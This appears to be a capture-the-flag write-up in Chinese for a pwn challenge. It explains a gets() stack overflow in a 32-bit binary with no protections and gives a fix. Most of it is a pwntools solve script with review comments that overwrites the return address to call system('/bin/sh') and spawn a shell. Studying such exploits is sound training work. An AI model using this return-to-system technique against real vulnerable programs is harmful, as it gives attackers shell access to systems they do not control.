该程序没有开启任何防护机制。
程序中存在 system 函数;输入通过 gets 读取,而 gets 不检查输入长度,因此可以造成栈溢出。(修复思路:将 gets 换成带长度限制的读取函数,并开启栈保护等编译防护。)
from pwn import*
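# Solve script for the challenge binary described in the notes at the top of
# this page: a 32-bit target with no mitigations, a system() call available in
# the binary, and an unbounded gets() read.
#
# NOTE(review): the page omits the endpoint. pwntools' remote() requires a host
# and a port, so this call raises TypeError until both are supplied.
sh = remote()

# Fixed addresses taken from the page. They can be hard-coded only because the
# binary is not position independent (the notes state no protections are on).
# NOTE(review): no fake return address is placed between sys_addr and its
# argument below, so sys_addr is presumably a `call system` instruction inside
# the binary rather than the PLT entry. Confirm against the disassembly.
sys_addr = 0x804855A
name = b'/bin/sh'
# Presumably the global buffer that receives the "name" input. TODO confirm.
name_addr = 0x804A080

# Filler up to the saved return address: presumably a 0x26-byte buffer offset
# plus the 4-byte saved EBP (verify in the disassembly). A stack canary would
# sit in this region and cause the overwrite to be detected.
padding = b'a' * (0x26 + 4)
# p32 packs each value as a 32-bit word: the first replaces the return address,
# the second is the next stack word, used as the argument.
payload = padding + p32(sys_addr) + p32(name_addr)

# Delimiters are bytes: pwntools tubes operate on bytes, and passing str under
# Python 3 triggers a BytesWarning and an implicit ASCII encode.
sh.sendlineafter(b'please tell me your name', name)
sh.sendlineafter(b'hello,you can leave some message here:', payload)
sh.interactive()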
[[攻防世界pwn-string]]